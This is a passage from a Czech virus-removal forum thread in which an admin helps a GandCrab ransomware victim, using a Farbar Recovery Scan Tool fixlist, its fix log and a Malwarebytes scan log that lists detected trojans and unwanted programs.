FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [No File]
FF Plugin-x32: @videolan.org/vlc,version=2.2.5.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [No File]
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [No File]
CHR StartupUrls: Default -> "hxxps://www.google.com/","hxxp://search.babylon ... XX9VMNAB90"
C:\WINDOWS\System32\Tasks\{B4B9A496-1465-614B-42E6-E9FACFD9FDCB}
C:\WINDOWS\System32\Tasks\{63FF5D84-F332-3C55-1873-E2C6DE6F96AA}
C:\WINDOWS\System32\Tasks\{36E954AC-8F78-691F-B718-D4CE7E4BCF08}
C:\WINDOWS\AutoKMS
C:\WINDOWS\msdownld.tmp
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
C:\ProgramData\DP45977C.lfl
EmptyTemp:
End
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Re: GANDCRAB V5.0.4
Fix result of Farbar Recovery Scan Tool (x64) Version: 08.11.2018
Ran by MeGret-TPC (11-11-2018 01:19:08) Run:1
Running from C:\Users\MeGret-TPC\Desktop
Loaded Profiles: MeGret-TPC (Available Profiles: MeGret-TPC)
Boot Mode: Safe Mode (minimal)
==============================================
fixlist content:
*****************
Start
CloseProcesses:
Task: {132D8886-4A07-462A-B824-78AF1B6BF888} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2018-10-14] (Google Inc.)
Task: {6783EA1B-F8CB-4EBD-878B-51DDF41C013A} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2018-10-14] (Google Inc.)
Task: {877C1772-9F30-4BE9-8463-5DF5AA19A3D4} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
FirewallRules: [{CFA12342-5A44-4771-94EA-6913D4D30364}] => (Allow) C:\Users\MeGret-TPC\AppData\Local\kAyeMDseXh.exe
FirewallRules: [{88291374-E8D6-4B34-914C-EA8B2AADE13B}] => (Allow) C:\Users\MeGret-TPC\deiefECnJ.exe
C:\ProgramData\kitot
C:\Users\MeGret-TPC\AppData\Local\Temp
C:\Program Files (x86)\Google\Chrome\Application\winmm.dll
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [601424 2018-07-07] (Oracle Corporation)
HKU\S-1-5-21-819675408-2753461327-3771956256-1001\...\MountPoints2: {0a26cf40-38e2-11e6-9bc2-806e6f6e6963} - "I:\setup.exe"
HKU\S-1-5-21-819675408-2753461327-3771956256-1001\...\MountPoints2: {6faddee6-cef4-11e8-9c3f-806e6f6e6963} - "D:\DVDSetup.exe"
HKU\S-1-5-21-819675408-2753461327-3771956256-1001\...\MountPoints2: {8b1956be-cef6-11e8-9c42-309c23650ed5} - "E:\Lenovo_Suite.exe"
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_181\bin\ssv.dll => No File
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_181\bin\jp2ssv.dll => No File
FF Plugin-x32: @java.com/DTPlugin,version=11.181.2 -> C:\Program Files (x86)\Java\jre1.8.0_181\bin\dtplugin\npDeployJava1.dll [No File]
FF Plugin-x32: @java.com/JavaPlugin,version=11.181.2 -> C:\Program Files (x86)\Java\jre1.8.0_181\bin\plugin2\npjp2.dll [No File]
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [No File]
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [No File]
FF Plugin-x32: @videolan.org/vlc,version=2.2.5.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [No File]
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [No File]
CHR StartupUrls: Default -> "hxxps://www.google.com/","hxxp://search.babylon ... XX9VMNAB90"
C:\WINDOWS\System32\Tasks\{B4B9A496-1465-614B-42E6-E9FACFD9FDCB}
C:\WINDOWS\System32\Tasks\{63FF5D84-F332-3C55-1873-E2C6DE6F96AA}
C:\WINDOWS\System32\Tasks\{36E954AC-8F78-691F-B718-D4CE7E4BCF08}
C:\WINDOWS\AutoKMS
C:\WINDOWS\msdownld.tmp
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
C:\ProgramData\DP45977C.lfl
EmptyTemp:
End
*****************
Processes closed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{132D8886-4A07-462A-B824-78AF1B6BF888}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{132D8886-4A07-462A-B824-78AF1B6BF888}" => removed successfully
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineCore" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{6783EA1B-F8CB-4EBD-878B-51DDF41C013A}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6783EA1B-F8CB-4EBD-878B-51DDF41C013A}" => removed successfully
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineUA" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{877C1772-9F30-4BE9-8463-5DF5AA19A3D4}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{877C1772-9F30-4BE9-8463-5DF5AA19A3D4}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UNP\RunCampaignManager" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{CFA12342-5A44-4771-94EA-6913D4D30364}" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{88291374-E8D6-4B34-914C-EA8B2AADE13B}" => removed successfully
C:\ProgramData\kitot => moved successfully
C:\Users\MeGret-TPC\AppData\Local\Temp => moved successfully
"C:\Program Files (x86)\Google\Chrome\Application\winmm.dll" => not found
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\SunJavaUpdateSched" => removed successfully
HKU\S-1-5-21-819675408-2753461327-3771956256-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0a26cf40-38e2-11e6-9bc2-806e6f6e6963} => removed successfully
HKLM\Software\Classes\CLSID\{0a26cf40-38e2-11e6-9bc2-806e6f6e6963} => not found
HKU\S-1-5-21-819675408-2753461327-3771956256-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{6faddee6-cef4-11e8-9c3f-806e6f6e6963} => removed successfully
HKLM\Software\Classes\CLSID\{6faddee6-cef4-11e8-9c3f-806e6f6e6963} => not found
HKU\S-1-5-21-819675408-2753461327-3771956256-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{8b1956be-cef6-11e8-9c42-309c23650ed5} => removed successfully
HKLM\Software\Classes\CLSID\{8b1956be-cef6-11e8-9c42-309c23650ed5} => not found
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43} => removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43} => removed successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9} => removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{DBC80044-A445-435b-BC74-9C25C1C588A9} => removed successfully
HKLM\Software\Wow6432Node\MozillaPlugins\@java.com/DTPlugin,version=11.181.2 => removed successfully
HKLM\Software\Wow6432Node\MozillaPlugins\@java.com/JavaPlugin,version=11.181.2 => removed successfully
HKLM\Software\Wow6432Node\MozillaPlugins\@nvidia.com/3DVision => removed successfully
HKLM\Software\Wow6432Node\MozillaPlugins\@nvidia.com/3DVisionStreaming => removed successfully
HKLM\Software\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.5.1 => removed successfully
HKLM\Software\Wow6432Node\MozillaPlugins\Adobe Reader => removed successfully
"Chrome StartupUrls" => removed successfully
C:\WINDOWS\System32\Tasks\{B4B9A496-1465-614B-42E6-E9FACFD9FDCB} => moved successfully
C:\WINDOWS\System32\Tasks\{63FF5D84-F332-3C55-1873-E2C6DE6F96AA} => moved successfully
C:\WINDOWS\System32\Tasks\{36E954AC-8F78-691F-B718-D4CE7E4BCF08} => moved successfully
C:\WINDOWS\AutoKMS => moved successfully
C:\WINDOWS\msdownld.tmp => moved successfully
"C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA" => not found
"C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore" => not found
C:\ProgramData\DP45977C.lfl => moved successfully
=========== EmptyTemp: ==========
BITS transfer queue => 7888896 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 17001338 B
Java, Flash, Steam htmlcache => 20052227 B
Windows/system/drivers => 415438 B
Edge => 92673474 B
Chrome => 1085331331 B
Firefox => 760817464 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 44570 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 0 B
LocalService => 0 B
NetworkService => 181950 B
NetworkService => 0 B
MeGret-TPC => 733368813 B
RecycleBin => 11564940 B
EmptyTemp: => 2.5 GB temporary data Removed.
================================
The system needed a reboot.
==== End of Fixlog 01:19:27 ====
Ran by MeGret-TPC (11-11-2018 01:19:08) Run:1
Running from C:\Users\MeGret-TPC\Desktop
Loaded Profiles: MeGret-TPC (Available Profiles: MeGret-TPC)
Boot Mode: Safe Mode (minimal)
==============================================
fixlist content:
*****************
Start
CloseProcesses:
Task: {132D8886-4A07-462A-B824-78AF1B6BF888} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2018-10-14] (Google Inc.)
Task: {6783EA1B-F8CB-4EBD-878B-51DDF41C013A} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2018-10-14] (Google Inc.)
Task: {877C1772-9F30-4BE9-8463-5DF5AA19A3D4} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
FirewallRules: [{CFA12342-5A44-4771-94EA-6913D4D30364}] => (Allow) C:\Users\MeGret-TPC\AppData\Local\kAyeMDseXh.exe
FirewallRules: [{88291374-E8D6-4B34-914C-EA8B2AADE13B}] => (Allow) C:\Users\MeGret-TPC\deiefECnJ.exe
C:\ProgramData\kitot
C:\Users\MeGret-TPC\AppData\Local\Temp
C:\Program Files (x86)\Google\Chrome\Application\winmm.dll
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [601424 2018-07-07] (Oracle Corporation)
HKU\S-1-5-21-819675408-2753461327-3771956256-1001\...\MountPoints2: {0a26cf40-38e2-11e6-9bc2-806e6f6e6963} - "I:\setup.exe"
HKU\S-1-5-21-819675408-2753461327-3771956256-1001\...\MountPoints2: {6faddee6-cef4-11e8-9c3f-806e6f6e6963} - "D:\DVDSetup.exe"
HKU\S-1-5-21-819675408-2753461327-3771956256-1001\...\MountPoints2: {8b1956be-cef6-11e8-9c42-309c23650ed5} - "E:\Lenovo_Suite.exe"
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_181\bin\ssv.dll => No File
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_181\bin\jp2ssv.dll => No File
FF Plugin-x32: @java.com/DTPlugin,version=11.181.2 -> C:\Program Files (x86)\Java\jre1.8.0_181\bin\dtplugin\npDeployJava1.dll [No File]
FF Plugin-x32: @java.com/JavaPlugin,version=11.181.2 -> C:\Program Files (x86)\Java\jre1.8.0_181\bin\plugin2\npjp2.dll [No File]
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [No File]
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [No File]
FF Plugin-x32: @videolan.org/vlc,version=2.2.5.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [No File]
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [No File]
CHR StartupUrls: Default -> "hxxps://www.google.com/","hxxp://search.babylon ... XX9VMNAB90"
C:\WINDOWS\System32\Tasks\{B4B9A496-1465-614B-42E6-E9FACFD9FDCB}
C:\WINDOWS\System32\Tasks\{63FF5D84-F332-3C55-1873-E2C6DE6F96AA}
C:\WINDOWS\System32\Tasks\{36E954AC-8F78-691F-B718-D4CE7E4BCF08}
C:\WINDOWS\AutoKMS
C:\WINDOWS\msdownld.tmp
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
C:\ProgramData\DP45977C.lfl
EmptyTemp:
End
*****************
Processes closed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{132D8886-4A07-462A-B824-78AF1B6BF888}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{132D8886-4A07-462A-B824-78AF1B6BF888}" => removed successfully
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineCore" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{6783EA1B-F8CB-4EBD-878B-51DDF41C013A}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6783EA1B-F8CB-4EBD-878B-51DDF41C013A}" => removed successfully
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineUA" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{877C1772-9F30-4BE9-8463-5DF5AA19A3D4}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{877C1772-9F30-4BE9-8463-5DF5AA19A3D4}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UNP\RunCampaignManager" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{CFA12342-5A44-4771-94EA-6913D4D30364}" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{88291374-E8D6-4B34-914C-EA8B2AADE13B}" => removed successfully
C:\ProgramData\kitot => moved successfully
C:\Users\MeGret-TPC\AppData\Local\Temp => moved successfully
"C:\Program Files (x86)\Google\Chrome\Application\winmm.dll" => not found
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\SunJavaUpdateSched" => removed successfully
HKU\S-1-5-21-819675408-2753461327-3771956256-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0a26cf40-38e2-11e6-9bc2-806e6f6e6963} => removed successfully
HKLM\Software\Classes\CLSID\{0a26cf40-38e2-11e6-9bc2-806e6f6e6963} => not found
HKU\S-1-5-21-819675408-2753461327-3771956256-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{6faddee6-cef4-11e8-9c3f-806e6f6e6963} => removed successfully
HKLM\Software\Classes\CLSID\{6faddee6-cef4-11e8-9c3f-806e6f6e6963} => not found
HKU\S-1-5-21-819675408-2753461327-3771956256-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{8b1956be-cef6-11e8-9c42-309c23650ed5} => removed successfully
HKLM\Software\Classes\CLSID\{8b1956be-cef6-11e8-9c42-309c23650ed5} => not found
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43} => removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43} => removed successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9} => removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{DBC80044-A445-435b-BC74-9C25C1C588A9} => removed successfully
HKLM\Software\Wow6432Node\MozillaPlugins\@java.com/DTPlugin,version=11.181.2 => removed successfully
HKLM\Software\Wow6432Node\MozillaPlugins\@java.com/JavaPlugin,version=11.181.2 => removed successfully
HKLM\Software\Wow6432Node\MozillaPlugins\@nvidia.com/3DVision => removed successfully
HKLM\Software\Wow6432Node\MozillaPlugins\@nvidia.com/3DVisionStreaming => removed successfully
HKLM\Software\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.5.1 => removed successfully
HKLM\Software\Wow6432Node\MozillaPlugins\Adobe Reader => removed successfully
"Chrome StartupUrls" => removed successfully
C:\WINDOWS\System32\Tasks\{B4B9A496-1465-614B-42E6-E9FACFD9FDCB} => moved successfully
C:\WINDOWS\System32\Tasks\{63FF5D84-F332-3C55-1873-E2C6DE6F96AA} => moved successfully
C:\WINDOWS\System32\Tasks\{36E954AC-8F78-691F-B718-D4CE7E4BCF08} => moved successfully
C:\WINDOWS\AutoKMS => moved successfully
C:\WINDOWS\msdownld.tmp => moved successfully
"C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA" => not found
"C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore" => not found
C:\ProgramData\DP45977C.lfl => moved successfully
=========== EmptyTemp: ==========
BITS transfer queue => 7888896 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 17001338 B
Java, Flash, Steam htmlcache => 20052227 B
Windows/system/drivers => 415438 B
Edge => 92673474 B
Chrome => 1085331331 B
Firefox => 760817464 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 44570 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 0 B
LocalService => 0 B
NetworkService => 181950 B
NetworkService => 0 B
MeGret-TPC => 733368813 B
RecycleBin => 11564940 B
EmptyTemp: => 2.5 GB temporary data Removed.
================================
The system needed a reboot.
==== End of Fixlog 01:19:27 ====
-
Rudy
- Site Admin
- Příspěvky: 118272
- Registrován: 30 říj 2003 13:42
- Bydliště: Plzeň
- Kontaktovat uživatele:
Re: GANDCRAB V5.0.4
Smazáno. Nastala nějaká změna?
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Re: GANDCRAB V5.0.4
Zdravím,stále mi nejdou spouštět exe soubory,fota,videa mají stále ty koncovky toho viru,vyskakují mi samy okna v Google, akorát co jde,,už nemusím do nouzového režimu když chci spustit ten adw...na tom druhém disků to samé
-
Rudy
- Site Admin
- Příspěvky: 118272
- Registrován: 30 říj 2003 13:42
- Bydliště: Plzeň
- Kontaktovat uživatele:
Re: GANDCRAB V5.0.4
Udělejte kompletní sken MBAM: http://www.malwarebytes.org/mbam.php a dejte log. Předem nic nemažte.
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Re: GANDCRAB V5.0.4
Malwarebytes
www.malwarebytes.com
-Podrobnosti logovacího souboru-
Datum skenování: 11.11.18
Čas skenování: 13:33
Logovací soubor: 05848752-e5ae-11e8-892c-309c23650ed5.json
-Informace o softwaru-
Verze: 3.6.1.2711
Verze komponentů: 1.0.482
Aktualizovat verzi balíku komponent: 1.0.7793
Licence: Zkušební
-Systémová informace-
OS: Windows 10 (Build 17134.165)
CPU: x64
Systém souborů: NTFS
Uživatel: FRNDA\MeGret-TPC
-Shrnutí skenování-
Typ skenování: Skenování hrozeb (Threat Scan)
Spuštění skenování: Ruční
Výsledek: Dokončeno
Skenované objekty: 307119
Zjištěné hrozby: 28
Hrozby umístěné do karantény: 0
Uplynulý čas: 1 min, 6 sek
-Možnosti skenování-
Paměť: Povoleno
Start: Povoleno
Systém souborů: Povoleno
Archivy: Povoleno
Rootkity: Zakázáno
Heuristika: Povoleno
Potenciálně nežádoucí program: Detekovat
Potenciálně nežádoucí modifikace: Detekovat
-Podrobnosti skenování-
Proces: 0
(Nebyly zjištěny žádné škodlivé položky)
Modul: 0
(Nebyly zjištěny žádné škodlivé položky)
Klíč registru: 11
PUP.Optional.SpyHunter, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\SpyHunter5, Žádná uživatelská akce, [3918], [552679],1.0.7793
Spyware.Socelars, HKU\S-1-5-21-819675408-2753461327-3771956256-1001\SOFTWARE\{6D187CC8-35BD-47F6-8760-D406AA1927B1}, Žádná uživatelská akce, [6268], [584328],1.0.7793
Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{1EA8098C-25F5-46DE-A412-1C6E1B81EDFC}, Žádná uživatelská akce, [6025], [571190],1.0.7793
Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{1EA8098C-25F5-46DE-A412-1C6E1B81EDFC}, Žádná uživatelská akce, [6025], [571190],1.0.7793
Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\{63FF5D84-F332-3C55-1873-E2C6DE6F96AA}, Žádná uživatelská akce, [6025], [571190],1.0.7793
Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{0D7125B3-7656-4619-A37A-395D9A914DC0}, Žádná uživatelská akce, [6025], [571190],1.0.7793
Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\LOGON\{0D7125B3-7656-4619-A37A-395D9A914DC0}, Žádná uživatelská akce, [6025], [571190],1.0.7793
Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\{36E954AC-8F78-691F-B718-D4CE7E4BCF08}, Žádná uživatelská akce, [6025], [571190],1.0.7793
Trojan.StartPage.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{92146086-56B7-4E0D-9EA3-C78832C285BA}, Žádná uživatelská akce, [14195], [555894],1.0.7793
Trojan.StartPage.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{92146086-56B7-4E0D-9EA3-C78832C285BA}, Žádná uživatelská akce, [14195], [555894],1.0.7793
Trojan.StartPage.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\{B4B9A496-1465-614B-42E6-E9FACFD9FDCB}, Žádná uživatelská akce, [14195], [555894],1.0.7793
Hodnota v registru: 0
(Nebyly zjištěny žádné škodlivé položky)
Data registrů: 0
(Nebyly zjištěny žádné škodlivé položky)
Datové proudy: 0
(Nebyly zjištěny žádné škodlivé položky)
Adresář: 1
Trojan.Agent, C:\PROGRAMDATA\BLOGGER, Žádná uživatelská akce, [402], [552313],1.0.7793
Soubor: 16
PUP.Optional.WiperSoft, C:\USERS\MEGRET-TPC\DESKTOP\WIPERSOFT.LNK, Žádná uživatelská akce, [4418], [340921],1.0.7793
PUP.Optional.SpyHunter, C:\PROGRAM FILES\ENIGMASOFT\SPYHUNTER\SPYHUNTER5.EXE, Žádná uživatelská akce, [3918], [552678],1.0.7793
PUP.Optional.SpyHunter, C:\PROGRAMDATA\ENIGMASOFT LIMITED\SH5_INSTALLER.EXE, Žádná uživatelská akce, [3918], [552679],1.0.7793
Trojan.Agent, C:\PROGRAMDATA\BLOGGER\BLOGGER.EXE, Žádná uživatelská akce, [402], [552313],1.0.7793
PUP.Optional.SpyHunter, C:\PROGRAMDATA\ENIGMASOFT LIMITED\SH5_INSTALLER.EXE, Žádná uživatelská akce, [3918], [552698],1.0.7793
PUP.Optional.WiperSoft, C:\WINDOWS\SYSTEM32\WIPERRM.EXE, Žádná uživatelská akce, [4418], [584847],1.0.7793
PUP.Optional.SpyHunter, C:\USERS\MEGRET-TPC\DOWNLOADS\SPYHUNTER-INSTALLER (2).EXE, Žádná uživatelská akce, [3918], [552698],1.0.7793
